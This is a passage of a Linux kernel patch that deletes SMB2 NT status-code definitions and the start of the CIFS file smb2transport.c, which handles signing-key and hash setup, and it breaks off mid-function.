+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
+-#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
+-#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION cpu_to_le32(0xC01E0325)
+-#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES cpu_to_le32(0xC01E0326)
+-#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE cpu_to_le32(0xC01E0328)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET cpu_to_le32(0xC01E0329)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E032E)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
+-#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
+-#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
+-#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
+-#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER cpu_to_le32(0xC01E0334)
+-#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
+-#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
+-#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
+-#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
+-#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
+-#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
+-#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
+-#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
+-#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
+-#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
+-#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
+-#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
+-#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT cpu_to_le32(0xC01E0341)
+-#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
+-#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
+-#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION cpu_to_le32(0xC01E0345)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED cpu_to_le32(0xC01E0346)
+-#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
+-#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
+-#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
+-#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON cpu_to_le32(0xC01E034D)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
+-#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
+-#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS cpu_to_le32(0xC01E0350)
+-#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
+-#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
+-#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
+-#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN cpu_to_le32(0xC01E0357)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT cpu_to_le32(0xC01E0358)
+-#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
+-#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION cpu_to_le32(0xC01E035A)
+-#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
+-#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
+-#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED cpu_to_le32(0xC01E0400)
+-#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
+-#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
+-#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
+-#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
+-#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
+-#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
+-#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS cpu_to_le32(0xC01E051C)
+-#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
+-#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS cpu_to_le32(0xC01E051F)
+-#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
+-#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST cpu_to_le32(0xC01E0521)
+-#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
+-#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
+-#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
+-#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
+-#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
+-#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
+-#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E0506)
+-#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E0507)
+-#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E0508)
+-#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
+-#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
+-#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
+-#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E050D)
+-#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
+-#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
+-#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
+-#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
+-#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA cpu_to_le32(0xC01E0515)
+-#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
+-#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
+-#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE cpu_to_le32(0xC01E0518)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS cpu_to_le32(0xC01E051A)
+-#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E051B)
+-#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
+-#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
+-#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
+-#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
+-#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
+-#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE cpu_to_le32(0xC01E0586)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING cpu_to_le32(0xC01E0587)
+-#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
+-#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
+-#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
+-#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
+-#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E05E1)
+-#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E05E2)
+-#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
+-#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
+-#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E05E5)
+-#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
+-#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
+-#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
+-#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
+-#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
+-#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
+-#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
+-#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
+-#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
+-#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
+-#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
+-#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
+-#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
+-#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
+-#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
+-#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
+-#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
+-#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
+-#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
+-#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
+-#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
+-#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
+-#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
+-#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
+-#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
+-#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
+-#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
+-#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
+-#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
+-#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
+-#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
+-#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
+-#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
+-#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
+-#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
+-#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
+-#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
+-#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
+-#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
+-#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
+-#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
+-#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
+-#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
+-#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
+-#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
+-#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
+-#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
+-#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
+-#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
+-#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
+-#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
+-#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
+-#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
+-#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
+-#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
+-#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
+-#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
+-#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
+-#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
+-#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
+-#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
+-#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
+-#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
+-#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
+-#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
+-#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
+-#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
+-#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
+-#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
+-#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
+-#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
+-#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
+-#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
+-#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
+-#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
+-#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
+-#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
+-#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
+-#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
+-#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
+-#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
+-#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
+-#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
+-#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
+-#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
+-#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
+-#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
+-#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
+-#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
+-#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
+-#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
+-#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
+-#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
+-#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
+-#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
+-#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
+-#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
+-#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
+-#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
+-#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
+-#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
+-#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
+-#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
+-#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
+-#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
+-#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
+-#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
+-#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
+-#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
+-#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
+-#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
+-#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
+-#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
+-#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
+-#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
+-#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
+-#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
+-#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
+-#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
+-#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
+-#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
+-#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
+-#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
+-#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
+-#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
+-#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
+-#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
+-#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
+-#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
+-#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
+-#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
+-#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
+-#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
+-#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
+-#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
+-#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
+-#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+deleted file mode 100644
+index 790acf65a0926..0000000000000
+--- a/fs/cifs/smb2transport.c
++++ /dev/null
+@@ -1,934 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org) 2006
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/list.h>
+-#include <linux/wait.h>
+-#include <linux/net.h>
+-#include <linux/delay.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/mempool.h>
+-#include <linux/highmem.h>
+-#include <crypto/aead.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-
+-static int
+-smb3_crypto_shash_allocate(struct TCP_Server_Info *server)
+-{
+-	struct cifs_secmech *p = &server->secmech;
+-	int rc;
+-
+-	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
+-	if (rc)
+-		goto err;
+-
+-	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
+-	if (rc)
+-		goto err;
+-
+-	return 0;
+-err:
+-	cifs_free_hash(&p->hmacsha256);
+-	return rc;
+-}
+-
+-int
+-smb311_crypto_shash_allocate(struct TCP_Server_Info *server)
+-{
+-	struct cifs_secmech *p = &server->secmech;
+-	int rc = 0;
+-
+-	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
+-	if (rc)
+-		return rc;
+-
+-	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
+-	if (rc)
+-		goto err;
+-
+-	rc = cifs_alloc_hash("sha512", &p->sha512);
+-	if (rc)
+-		goto err;
+-
+-	return 0;
+-
+-err:
+-	cifs_free_hash(&p->aes_cmac);
+-	cifs_free_hash(&p->hmacsha256);
+-	return rc;
+-}
+-
+-
+-static
+-int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+-{
+-	struct cifs_chan *chan;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses = NULL;
+-	int i;
+-	int rc = 0;
+-	bool is_binding = false;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid == ses_id)
+-			goto found;
+-	}
+-	cifs_server_dbg(VFS, "%s: Could not find session 0x%llx\n",
+-			__func__, ses_id);
+-	rc = -ENOENT;
+-	goto out;
+-
+-found:
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-
+-	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
+-		      ses->ses_status == SES_GOOD);
+-	if (is_binding) {
+-		/*
+-		 * If we are in the process of binding a new channel
+-		 * to an existing session, use the master connection
+-		 * session key
+-		 */
+-		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		goto out;
+-	}
+-
+-	/*
